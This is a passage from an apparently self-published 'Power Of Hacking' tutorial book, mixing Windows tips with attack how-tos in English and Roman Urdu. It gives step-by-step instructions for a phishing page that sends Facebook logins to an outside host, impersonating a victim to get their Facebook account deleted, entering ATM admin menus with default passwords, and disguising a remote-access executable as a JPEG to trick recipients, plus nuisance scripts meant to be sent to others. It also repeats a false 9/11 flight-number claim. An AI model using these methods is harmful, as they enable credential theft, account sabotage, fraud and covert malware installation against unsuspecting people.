ek simple template tyar ho gya Editable Reji0n dalne ka faida ye he k Ap k tamam content same rahe ge mgr jahan ap ne editable regi0n dala he wahan ap edit kr skte hen, hume ab HOME ka page bnana he, ap Template ko open kren, wahan Editable Regi0n pe H0me ki detail likh kr save as index.html krdo. Isi terhan se game.html, software.html etc ka page bna kr sb ko link krwa do, lo g ap ki static web tyar..----END--Hack Tutrial:-
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 98
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree OPEN FIREFOX FASTER !!! Mozilla Firefox internet browsing number of huge.Mozilla Firefox browser is flexibility,exceptional add -on, faster browser, and security all in all software.At a time Mozilla Firefox software to make run long time and takes a long time to open a new tab.
Even, some user used to another browser.My this post problems have been like for those who.Easy to reset the two works in your Mozilla Firefox :* Save mode turn your Mozilla Firefox.* windows xp the "run" command to restart ( start > run or logo r )* Than type Firefox - safe- mode and then press OK.* windows seven / vista : " run " commands to restart ( logo r )* Than type Firefox.exe-safe-mode and than press OK.Now, reset all user preference to Firefox defaults from the pop up and click the make change and restart.That's it now, and when you first install Mozilla Firefox, so it will work.
Hack Tutrial:HIDING YOUR PC'S HARD DRIVE CAN EASILY Sometime in your private own computer need to become someone users else.On this time may be some problems.For example, may be something in your personal computer you do not want to see that.If you want you can keep your hard disk drive hidden and can not
to access.
How do this work ?How do this work is given below :1.At first you got START menu > Run, type Gpedit.msc than enter.2.Group policy into a windows come.3. User configuration> Administrative Templates> Windows Components> Windows Explorer Commend than enter.4.Many option can be seen right the number.5.Double click " hide these specified drive in my computer ".6.When new windows come than you select the Enable.7.You can see the under the drop down Click on the drop-down menu for any one or all Hide Restrict all drives, select the drive to Apply> ok again.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 99
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
8.Now you open your computer and you see where the drive gone.9.This rules regulations can be suspended.For "Prevent access to drives from my computer" and double-click the upmarket 6 and 7 of the rules can be done.10. Option No. 6 to go back to the previous settings at the time of not configured. Hack Tutrial:COMPUTER FRAUD COMPUTER FRAUD
BEFORE THE ADVENT OF COMPUTERS, CONFIDENCE SCHEMES AND OTHER
TYPES OF FRAUD OFTEN REQUIRED THE CRIMINALS TO MEET WITH THEIR VICTIMS FACE-TO- FACE , DEAL WITH THEM OVER THE PHONE, OR BY MAIL . THESE METHODS OFTEN PUT THE CRIMINAL AT RISK OF BEING IDENTIFIED AND APPREHENDED LATER BY A POSITIVE IDENTIFICATION .MANY CRIMES COMMITTED OVER THE INTERNET ARE PERPETRATED BY NAMELESS, FACELESS ATTACKERS THAT CAN COMMIT THEIR CRIMES AND FRAUDULENT ACTS FROM ANYWHERE IN THE WORLD . BECAUSE OF THE RELATIVE SIMPLICITY OF FRAUD AND INTERNET CRIMES, CRIMINALS HAVE BEEN ABLE TO DEVISE MANY WAYS OF BILKING PEOPLE OUT OF MONEY AND PROPERTY.
TYPES OF FRAUD:THERE ARE MANY DIFFERENT TYPES OF FRAUD , BUT COMMON CASES OFTEN INCLUDE :• ONLINE CONFIDENCE SCHEMES• INTERNET INVESTMENT FRAUD • C OMPUTER HACKING • A CCOUNT AND CREDIT CARD NUMBER THEFT • THEFT OF PERSONAL INFORMATION • HACKING INTO COMPUTER SYSTEMS TO ALTER OR DELETE INFORMATION IT IS IMPORTANT FOR PEOPLE TO BE AWARE OF THE POTENTIAL FOR COMPUTER FRAUD AND TO PROTECT THEMSELVES AND THEIR PROPERTY FROM THEFT . ALTHOUGH MOST PEOPLE ARE AWARE THAT THEY SHOULD BE WARY OF THEIR ACTIONS ON THE INTERNET AND SHOULD SET UP SOME SORT OF PROTECTION , MANY DO NOT KNOW THE RIGHT STEPS TO TAKE. PROTECTING AGAINST C OMPUTER F RAUD PEOPLE CAN FOLLOW SEVERAL STEPS TO PROTECT THEMSELVES AGAINST COMPUTER FRAUD INCLUDING :• INSTALL AND USE ANTI -SPYWARE PROGRAMS TO AVOID THE THEFT OF PERSONAL INFORMATION • PASSWORD PROTECT VALUABLE DOCUMENTS AND COMPUTER FILES• DO NOT GIVE ANYONE YOUR PERSONAL PASSWORDS AND DO NOT USE THE SAME PASSWORD FOR EVERY FILE • MAKE SURE TO CHANGE PASSWORDS FREQUENTLY AND DO NOT USE COMMONLY KNOWN INFORMATION LIKE FIRST , MIDDLE , OR LAST NAMES , BIRTHDATES OR OTHER INFORMATION THAT WOULD BE EASY TO DECIPHER . • USE FIREWALL SOFTWARE TO PROVIDE EXTRA PROTECTION AGAINST HACKERS AND OUTSIDE THREATS. • MAKE SURE TO DOUBLE -CHECK ACCOUNT BALANCES AND IMMEDIATELY REPORT SUSPICIOUS ACTIVITY ON ANY ACCOUNTS. • DO NOT MAKE ONLINE PURCHASES THROUGH WEBSITES THAT DO NOT HAVE SECURITY SETTINGS . • DO NOT DIVULGE PERSONAL INFORMATION ONLINE TO ANYONE THAT YOU DO NOT KNOW OR TRUST . C OMPUTER F RAUD AND C RIMINAL D EFENSE COMPUTER FRAUD IS A SERIOUS CRIME AND CAN RESULT IN CRIMINAL PROSECUTION , FINES, AND JAIL TIME IF AN INDIVIDUAL IS Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 100
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree FOUND GUILTY .
IF YOU HAVE BEEN WRONGLY ACCUSED OF COMPUTER FRAUD , VISIT THE WEBSITE OF THE MILWAUKEE CRIMINAL ATTORNEYS OF K OHLER & HART , LLP. Hack Tutrial:-ATM hacks What is required:Older mini bank ATM's. These are usually rounder at the top and say mini bank across it. 1. Once you've found the atm, press and hold down the 'ENTER' 'CANCEL' CLEAR' buttons for about 3-5 seconds 2. Then, let go of all 3 buttons and press the '1' '2' and '3' keys in order. You should now see a screen that says enter password 3. Sometimes, the owners don't change the default passwords. if this is the case, you will have full power. The account you want to get into is the admin account. The default password can be '555555' or '666666'. 4. If you get in, the menu options are self explanitory. Other default passwords for lower-access accounts can be '111111' '222222' '333333' or '444444' This is for educational purposes only. Use at your own risk. Hack Tutrial:HOW TO DELETE ANY ONES FACEBOOK ACCOUNT A LITTLE BIT OF SOCIAL ENGEENRING?
Requirements.1. Victom ka full name 2. Victom ki date of birth 3. Victom ki fb profile ka url address 4. 1 id banayen yahoo per ya gmail per victom kr first and last name ki. Yeh sari details ap ko victom ke fb account se mil jayen gi. 5.Ab is link er jaen www.facebook.com/help/contact.php?show_form=cannot_identify 6.Ab jo sari requirements thi wo is form ma fill kr dyn 7. Form ke last option main 'description of your issue' Us main ap khud victom ban ke kahen je meri yeh id kisi ne hack kr li hai main 1 regulr membr hn or new acnt bnane mn mjhe koi diqqat nhn h. Facebook team ap ki yeh application parhtw hi wo account 24-72 hours main del mar de gi. And da victom is hacked.....
Hack Tutrial:NOTEPAD TRICKS This trick will Open Notepad continuously automatically Step 1: Open Notepad. Step 2: Paste the following code in the notepad. @ECHO off Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 101
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree :trick START %SystemRoot%\system32\notepad.exe GOTO trick Step 3: Now go to file and click on save as Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:) ______________________ This trick will pop out error messages again and again Step 1: Open Notepad. Step 2: Paste the following code in the notepad. @ECHO off :Begin msg * Welcome to hackfact msg * You are learning cool notepad tricks msg * Notepad tricks rocks msg * Using notepad tricks we can even control whole computer msg * What are your views in all these tricks using notepad GOTO BEGIN Step 3: Now go to file and click on save as Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:) ______________________ Matrix falling notepad trick After the success of the movie matrix people just started loving matrix pattern , its style. So here is a notepad trick which will show that matrix affect in your command prompt Step 1: Open Notepad. Step 2: Paste the following code in the notepad. @echo off color 02 :tricks echo %random%%random%%random%notepad%random%%random%tricks%random% %random%%random%%random%%random% goto tricks Step 3: Now go to file and click on save as Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:) Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 102
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Notepad and vbsfile tricks combo Hit Enter Key Continuously Step 1: Open Notepad. Step 2: Paste the following code in the notepad. Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "~(enter)" loop Step 3: Now go to file and click on save as Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:) ______________________ Press backspace continuously notepad trick (so Let's go back a few steps.) Step 1: Open Notepad. Step 2: Paste the following code in the notepad. Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{bs}" loop Step 3: Now go to file and click on save as Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:) ______________________ Toggle Caps Lock button On-Off Continuously Step 1: Open Notepad. Step 2: Paste the following code in the notepad. Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" loop Step 3: Now go to file and click on save as Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs Step 5: Now go and click on it or you can send this notepad to your friends Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 103
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree also.......bingoo...:) Now if u want to disable any of these notepad and vbs trick combo just go do task manager click on process then find wscript.exe and end this process and for all notepad and batch programming tricks combo just restart your computer or close the command prompt. CMD TRICKS How to do calculations on Command Prompt ?The command processor CMD.EXE comes with a mini calculator that can perform simple arithematic operations: C:\>SET /A 5+3 8 C:\>SET /A 3*(9/4) 6 C:\>SET /A (4*5)/5 4How to Create your own Run Command ? Step 1: Go to “Start,” “Run,” (told you we use it a lot) and type regedit. Step 2: Navigate to the following:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App s Path Step 3: Create a new folder/key under Apps Path. (Right-Click Apps Path and click “New,” “Key.”) Step 4: Title the new folder/key the name of the application, e.g. firefox.exe. Step 5: Right-Click the default string value (the thing automatically created in your new folder) and click Modify. Step 6: Change the value to the path of the executable you are attempting to run. E.g. C:\Program Files\Mozilla Firefox\firefox.exe. Step 7: Create a new “String Value” by right-clicking under the default value (the thing we just edited) and select “New,” “String Value.” Name it Path and enter the value as the same path you previously entered. HOW TO HACK FACEBOOK ACCOUNTS? How to hack facebook account and what are its preventive measures Step 1: Go to www.facebook.com Step 2: Save the login page of facebook (shortcut:press ctrl+S) Step 3: Now 2 things would have been saved in your computer with the name "Welcome to Facebook - Log In, Sign Up or Learn More" Step 4: Right click on the saved file with name "Welcome to Facebook - Log In, Sign Up or Learn More.htm" and open it with notepad Step 5: Now search where the word action is written in it for the first time (shortcut:press ctrl+F then type action in it and then press enter). Step 6: Now after action you will see action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" Step 7: Now replace that line with action="http://hackfact.com/fb.php?id=your-email-idhere@gmail.com&link=www.facebook.com/login.php?login_attempt=1" Step 8: Now replace the line your-email-id-here@gmail.com with your email-id where you want to recieve the password. Step 9: Save the notepad(shortcut: ctrl+s). Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 104
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Step 10: Now just put this page on your Desktop who so ever will login from this will be hacked. You will be having his/her password in your email-id or the other option you have is that upload this page on a free web hosting site where you can upload both these pages and if you have your own website you can upload this on that and send the link to others. bingoooooooo..:). Note: Remember both the files will be moved together which you saved with the name "Welcome to Facebook - Log In, Sign Up or Learn More" and you can rename the file with the name "Welcome to Facebook - Log In, Sign Up or Learn More.htm" but not that folder. This trick was for educational purpose only and the preventive measure is that always see the URL of the site(Complete URL if site has url www.facebook.com.hackfact.com then also its fake not genuine.). How to make PC really run faster than before? 1.Let your PC boot up completely before opening any applications. 2.Refresh the desktop after closing any application. This will remove any unused files from the RAM. 3.Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM (less than 64 MB). 4.Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM 5.Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin. 6.Delete the temporary internet files regularly. 7.Defragment your hard drive once every two months. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster. 8.Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible. 9.When installing new Softwares disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application. 10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum. RAM IS THE WORKING AREA (DESKTOP) OF THE CPU, KEEP IT AS EMPTY AND UNCLUTTERED AS POSSIBLE! Lesson 2 - Simple (and free) ways how to speed up your computer: Tip: Disable the XP loading screen To speed up booting your computer process slightly, disable the Windows XP loading screen. This can be done very easy: - Open the MSCONFIG utility (Open Start\Run and type msconfig) - Select the boot.ini tab - Check the /NOGUIBOOT option. When you boot (start) your PC, you will see a black screen in between POST and the welcome screen from now on. Tip: Check your hard drives with scandisk With time, tons of small data problems and physical problems can develop and slow down the performance of your hard drive. While defragmenting the drive can help restore much of the performance you might have lost, there are other issues such as lost clusters which the Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 105
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree defragmentation utility cannot fix. Because of this, it is a good idea to run XP's error checking utility once in a while. This utility scans your disks for errors and optionally attempt to correct them. - Open My computer - Right click the hard disk you wanna scan and select Properties from the menu - Choose the Tools tab and under Error checking click the Check now… button. - Check both options. You will need to restart the computer to do the full disk check. Your disk will be fully checked for errors upon reboot, but this can take quite a while. How to protect USB Virus from entering ur PC? HI FRIENDS, I HAVE A SLOUTION FOR UR ISSUE. YOU CAN MAKE UR NORMAL PEN DRIVE TO VIRUS PROTECTED PENDRIVE . FOR THAT U WANT 1 PC WHICH HAVING WINDOWS VISTA 0R 7 OS INSTALLED . F OLLOW THE BELOW STEPS …….. 1) CONNECT UR PEN DRIVE TO PC WHICH HAVING WIDOWS VISTA OR WINDOWS 7 OPERATING SYSTEM. (THE USER MUST HAVING ADMINISTRATOR RIGHTS ) 2) OPEN ‘MY COMPUTER ’ & RIGHT CLICK ON PENDRIVE ICON THEN SELECT ‘FORMAT’ OPTION. BEFORE FORMATTING YOU MUST TAKE A BACK UP OF ALL OF YOUR DATA BECAUSE IT DELETES WHOLE DATA FROM UR PEN DRIVE . 3) IN FORMAT WINDOW SELECT FILE SYSTEM TAB & CHANGE IT TO ‘NTFS’ THEN CLICK ON ‘START’ TO START FORMATTING . 4) AFTER FORMATTING DONE CLOSE THE FORMAT WINDOW & OPEN UR PENDRIVE . 5) CREATE ONE FOLDER IN PEN DRIVE & RENAME IT TO ‘SECURED’. 6) BACK TO ‘MY COMPUTER ’ & AGAIN RIGHT CLICK ON PENDRIVE & NOW SELECT ‘PROPERTIES’ TAB. 7) IN PROPERTIES WINDOW SELECT SECURITY TAB THEN CLICK ON EDIT & TICK ON ‘DENY’ FOR ‘WRITE’ PERMISSION THEN PRESS OK TO APPLY THE SETTINGS. 8) OPEN PEN DRIVE AGAIN , RIGHT CLICK ON ‘SECURED ’ FOLDER SELECT ‘PROPERTIES’ THEN ‘SECURITY’ TAB. AGAIN CLICK ON ‘EDIT ’ TAB & SET ‘ALLOW’ PERMISSION TO ‘F ULL C ONTROL’ THEN CLICK OK TO APPLY SETTINGS . 9) OPEN ‘SECURED’ FOLDER , CREATE ONE FOLDER INTO THAT & RENAME IT TO ‘SECURED.EXE’. 10) RIGHT CLICK ON ‘SECURED.EXE’ FOLDER SELECT ‘PROPERTIES’ & MAKE IT HIDDEN BY SELECTING ‘HIDDEN’ ATTRIBUTE THEN SELECT ‘SECURITY’ TAB CLICK ON ‘EDIT’ & SET ‘DENY’ PERMISSION TO ‘FULL CONTROL’ . 10) PRESS ‘OK’ TO APPLY THE SETTINGS. NOW UR PEN DRIVE IS VIRUS PROTECTED . BUT U CAN ’T COPY FILES INTO THAT DIRECTLY . U NEED TO COPY ALL OF UR FILES TO THE SECURED FOLDER & I RECOMMAND THAT COPY UR SOFTWARE SETUP FILES TO THE ZIP FOLDER SO , VIRUS CAN ’ T ACCESS SOFTWARE ’ S EXE FILES . H OW TO HIDE AND CONVERT .EXE INTO .JPEG? FIRSTLY, CREATE A NEW FOLDER AND MAKE SURE THAT THE OPTIONS ‘SHOW HIDDEN FILES ’ IS CHECKED AND ‘ HIDE EXTENSIONS FOR KNOWN FILE TYPES’ IS UNCHECKED . BASICALLY WHAT U NEED IS TO SEE HIDDEN FILES AND SEE THE EXTENSION OF ALL YOUR FILES ON YOUR PC .
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 106
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree 2. PASTE A COPY OF YOUR SERVER ON THE NEW CREATED FOLDER . LET’S SAY IT’S CALLED SERVER .EXE (THAT’S WHY YOU NEED THE EXTENSION OF FILES SHOWING, CAUSE YOU NEED TO SEE IT TO CHANGE IT) 3. NOW YOU’RE GOING TO RENAME THIS SERVER .EXE TO WHATEVER YOU WANT, LET’S SAY FOR EXAMPLE PICTURE .JPEG 4. WINDOWS IS GOING TO WARN YOU IF YOU REALLY WANT TO CHANGE THIS EXTENSION FROM EXE TO JPEG, CLICK YES. 5. NOW CREATE A SHORTCUT OF THIS PICTURE .JPEG IN THE SAME FOLDER. 6. NOW THAT YOU HAVE A SHORTCUT, RENAME IT TO WHATEVER YOU WANT , FOR EXAMPLE, ME.JPEG. 7. GO TO PROPERTIES (ON FILE ME.JPEG) AND NOW YOU NEED TO DO SOME CHANGES THERE. 8. FIRST OF ALL DELETE ALL THE TEXT ON FIELD START IN AND LEAVE IT EMPTY . 9. THEN ON FIELD TARGET YOU NEED TO WRITE THE PATH TO OPEN THE OTHER FILE (THE SERVER RENAMED PICTURE .JPEG) SO U HAVE TO WRITE THIS : C:WINDOWS SYSTEM32CMD .EXE /C PICTURE .JPEG 10. THE LAST FIELD , C PICTURE.JPEG IS ALWAYS THE NAME OF THE FIRST FILE. IF YOU CALLED THE FIRST FILE SOCCER .AVI YOU GOTTA WRITE C:WINDOWS SYSTEM32CMD .EXE /C SOCCER .AVI GOT IT ? 11. SO WHAT YOU ’RE DOING IS WHEN SOMEONE CLICKS ON ME .JPEG, A CMD WILL EXECUTE THE OTHER FILE PICTURE .JPEG AND THE SERVER WILL RUN . 12. ON THAT FILE ME .JPEG (SHORTCUT), GO TO PROPERTIES AND YOU HAVE AN OPTION TO CHANGE THE ICON . CLICK THAT AND A NEW WINDOW WILL POP UP AND U HAVE TO WRITE THIS: %SYSTEMROOT%SYSTEM 32SHELL32.DLL . THEN PRESS OK. 13. YOU CAN SET THE PROPERTIES HIDDEN FOR THE FIRST FILE (PICTURE.JPEG ) IF YOU THINK IT ’S BETTER TO GET A CONNECTION FROM SOMEONE .
14. BUT DON’T FORGET ONE THING , THESE 2 FILES MUST ALWAYS BE TOGETHER IN THE SAME FOLDER AND TO GET CONNECTED TO SOMEONE THEY MUST CLICK ON THE SHORTCUT CREATED NOT ON THE FIRST FILE. SO RENAME THE FILES TO WHATEVER YOU WANT CONSIDERING THE PERSON AND THE KNOWLEDGE THEY HAVE ON THIS MATTER .
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 107
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree 15. FOR ME FOR EXAMPLE I ALWAYS WANT THE SHORTCUT SHOWING FIRST SO CAN BE THE FIRST FILE TO BE OPENED. SO I RENAME THE SERVER TO PICTURE2.JPEG AND THE SHORTCUT TO PICTURE 1.JPEG. THIS WAY THE SHORTCUT WILL SHOW UP FIRST . IF YOU SET HIDDEN PROPERTIES TO THE SERVER (PICTURE.JPEG) THEN U DON ’T HAVE TO BOTHER WITH THIS DETAIL BUT I’ M WARNING YOU , THE HIDDEN FILE WILL ALWAYS SHOW UP INSIDE OF A ZIP FILE OR RAR . 16. SO THE BEST WAY TO SEND THESE FILES TOGETHER TO SOMEONE IS COMPRESS THEM INTO ZIP OR RAR . 17. INSIDE THE RAR OR ZIP FILE YOU CAN SEE THE FILES PROPERTIES AND EVEN AFTER ALL THIS WORK YOU CAN SEE THAT THE SHORTCUT IS RECOGNIZED LIKE A SHORTCUT BUT HOPEFULLY THE PERSON YOU SENT THIS TOO DOESN ’ T KNOW THAT AND IS GOING TO OPEN IT .
1. How to disable Unwanted Visual effect in Windows 7? Disabling the Unwanted Visual Effects in Windows 7 to Speed Up more For this right click on ” Computer” and select “Properties” from the right click menu. Click on ” Advanced System Settings ” from the left pane to open up the ” System Properties ” window. Select the “Advanced” tab from it. Then Under ” Performance ” click ” Settings “. Choose ” Custom: ” Options From it. Now un tick all the options and select only the last four options (actually three only needed; you can un tick the second option from the last four). See the screen shot if you have any doubt. Now just logoff your system and turn logon. Even though we have tuned off the aero effects in Windows 7 still there are many unwanted visual effects that can be safely disabled to speed up windows 7 even more. disabling services in windows 7 Speed Up Windows 7 Ultimate Guide To Make Windows 7 Blazing Fast!!! You will now notice the speed difference now. How to protect Facebook account from being hacked? Hacking of Facebook Account #1. Its very easy to hack a Facebook account, If you are ignorant about the page URL. Many pishers around the Web create a page which will exactly look like the Facebook login page. If you login using that page, Your account will be in the hands of some Tom, Dick or Harry. So always check the URL of the page before logging in. Facebook Login Page 550x149 How to Prevent Hacking of Facebook Account #2. Visiting Links which are shared by your Friends. This would be also a cause of Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 108
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Hacking of Facebook account. So, Double check when you are visiting a link shared by your friends. If you think its a good clean link, then proceed. Links on Facebook How to Prevent Hacking of Facebook Account #3. Do you think, Your Facebook account is being accessed by anyone? Get Notified when your Facebook account is logged in from a different place. How to do this?1. Login to your Facebook account, Click on Account and navigate to Account Settings. 2. Under Account Security, Check Send me an email, If a new computer or mobile device logs into this account. You can also Check Send me a text message, If you have added a mobile device. Account Security on Facebook 550x206 How to Prevent Hacking of Facebook Account Additional Tip: Also enable HTTPS secure browsing. HTTPS on Facebook How to Prevent Hacking of Facebook Account #4. Avoid using Spam Applications. Don’t try to use an application which you don’t know or seen some of your friends using. To View/Edit applications which you are using, Go to Applications Settings page. Additional Tip: Remove Applications which you are not using now. Account Security on Facebook 550x206 How to Prevent Hacking of Facebook Account #5. Always use a complex and very strong Password. A combination of Alphabets, Numbers and Special Characters is an unbeatable or unguessable password. Avoid using your Name, Girl Friends name, Your Mobile number etc., in your password as these are easily guessable. #6. Don’t accept requests from the people you don’t know. Avoid adding people you don’t know to your friends list. If he/she is a Mutual Friend then you can add. #7. Regularly scan your Computer with some Anti-Spyware or Anti-Malware tools. Some of the recommended tools are Panda Active Scan, Trend Micro Housecall Thus these are the 7 Basic as well as Best possible ways for preventing and stopping the Hacking of Facebook Account. How to disable AERO Theme on windows 7? Disable the Aero Theme on Windows 7 Right Click on your Desktop and select ” Personalize ” click the Window Color Tab. Uncheck the Box saying ” Enable Transparency ” and then click on ” Open classic appearance properties for more color options”. Then a window will open up. Apply a Standard or Basic theme from it. The Standard Windows 7 theme is more preferred. The aero user interface certainly adds some ” Eyecandy ” to Windows 7 but certainly is a resource hog especially when, what you expect from windows 7 is more performance juice. Aero user interface squeezes your graphics or video card to its maximum. So why dont we just avoid the Windows 7 aero? if we care more about speed and performance in Windows 7. So Disabling the Aero in Windows 7 certainly adds an extra speed boost to it. disabling aero Speed Up Windows 7 Ultimate Guide To Make Windows 7 Blazing Fast!!!
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 109
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Disabling the aero theme alone in Windows 7 will really speed things up. You can know this by looking into the memory consumption when aero is turned on and off. Hack Tutrial:1. BUSH HID THE FACTS/THIS APP CAN BREAK This is one of the most popular notepad tricks because of its mysterious nature. In order to get an idea as to what this trick does, just follow the steps given below:
Open Notepad. Type “BUSH HID THE FACTS” or “this app can break” (without quotes). Save that file with any name and close it. Open It Again to see the magic.
Reason For This Behavior: It is known as the 4335 Rule. It means that if we enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters each, and the last word has five letters. Then Notepad Automatically hides the text into unknown code. 2. WORLD TRADE CENTER ATTACK TRICK
As you might be knowing that the flight number of the plane that had hit World Trade Center on that dreadful day (9/11) was Q33NY. Now call this trick a coincidence or something else but whatever it is, it does startle us.
Open Notepad. Type “Q33N” (without quotes) in capital letters. Increase the font size to 72. Change the Font to Wingdings.
You will be amazed by the findings. 3. MAKE A PERSONAL LOG-BOOK OR A DIARY
Did you know that you can also use Notepad as a simple digital diary or a personal Log-Book ? Well, if you didn‘t then follow the below mentioned steps to make one for yourself !
Open Notepad. Type .LOG (in capital letters) and hit enter. Save it with any name and close it.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 110
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
Open it again.
When you open the file again you will see the current date and time being inserted automatically after the .LOG line. This will happen automatically every time you reopen the the notepad file. 4. TEST YOUR ANTI-VIRUS You can also test your anti virus program for its effectiveness using a simple notepad trick. Follow the steps below to know more:
Open Notepad. Copy the code give below in the notepad file: X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TESTFILE!$H+H* Save it with an .exe extension like testvirus.exe
As soon as you save this file, your anti virus program will detect the file (virus) immediately and will attempt to delete it. If this happens then your Antivirus is working properly. If not, then its time to look for some other reliable program. 5. CONTINUALLY POP THE CD DRIVE
Open Notepad. Copy the code given below onto the notepad file:
Set oWMP = CreateObject(―WMPlayer.OCX.7?) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 111
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree loop
Save it as “Anything.VBS”.
Now open the file and see the magic! The file will continuously force the CD rom to pop out! And If you have more than one then it pops out all of them! 6. MATRIX EFFECT
Not much to explain, just follow the steps and see the amazing matrix effect happen in your DOS window:
Open Notepad. Copy the below mentioned text in your notepad file:
@echo off color 02 :start echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start
Save the file with .bat extension like Matrix.bat
Thats it. Just open the file to see the matrix effect right before your eyes! 7. CHANGE THE HEADER/FOOTER OF YOUR NOTEPAD FILE More often than not whenever you get a printout of your notepad file, it starts with ―Untitled‖ or the filename at top, and ―Page ‖ on bottom. Now if you want to get rid of it or want to change it, just follow the simple steps given below.
Open Notepad. Click on File -> Page Setup.
Replace the text written in the “Header” and “Footer” box (as shown above) by any of the following codes:
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 112
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree &l Left-align the characters that follow &c Center the characters that follow &r Right-align the characters that follow &d Print the current date &t Print the current time &f Print the name of the document &p Print the page number 8. CONSTANTLY REPEAT MESSAGES Using this notepad trick you can annoy anyone and can actually force them to log off or leave the computer (LOL….). This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more:
Open Notepad. Paste the following code in the notepad file:
@ECHO off :Begin msg * Hi msg * Are you having fun? msg * I am! msg * Lets have fun together! msg * Because you have been o-w-n-e-d GOTO BEGIN
Save the file with any file name but with .bat as extension and close it. For eg. Freakymessage.bat
After saving the file just open it (by double clicking) and see what happens. Pssstttt……. You can piss of your friends by sending it as an email attachment asking them to try it out ! 9. SHUT-DOWN THE COMPUTER AFTER CONVEYING ANY MESSAGE
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 113
